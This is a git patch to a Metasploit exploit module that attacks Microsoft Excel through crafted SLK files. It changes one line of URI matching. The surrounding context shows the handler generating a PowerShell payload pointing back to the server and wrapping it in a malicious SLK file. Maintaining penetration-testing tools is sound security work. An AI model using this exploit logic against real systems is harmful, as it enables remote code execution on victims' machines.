From 2d1cecd4d5493f4e38666b76ebffceebee50e596 Mon Sep 17 00:00:00 2001 From: Carter Brainerd Date: Wed, 23 Jan 2019 13:39:52 -0500 Subject: [PATCH] Fix request pattern matching --- modules/exploits/windows/fileformat/office_excel_slk.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/fileformat/office_excel_slk.rb b/modules/exploits/windows/fileformat/office_excel_slk.rb index 4ca28bde95..50c3cc77d2 100644 --- a/modules/exploits/windows/fileformat/office_excel_slk.rb +++ b/modules/exploits/windows/fileformat/office_excel_slk.rb @@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote end def on_request_uri(cli, request) - if request.raw_uri.to_s.end_with? '.slk$' + if request.raw_uri.to_s.end_with? '.slk' print_status("Handling request for .slk from #{cli.peerhost}") payload = gen_psh("#{get_uri}", "string") data = create_slk(payload)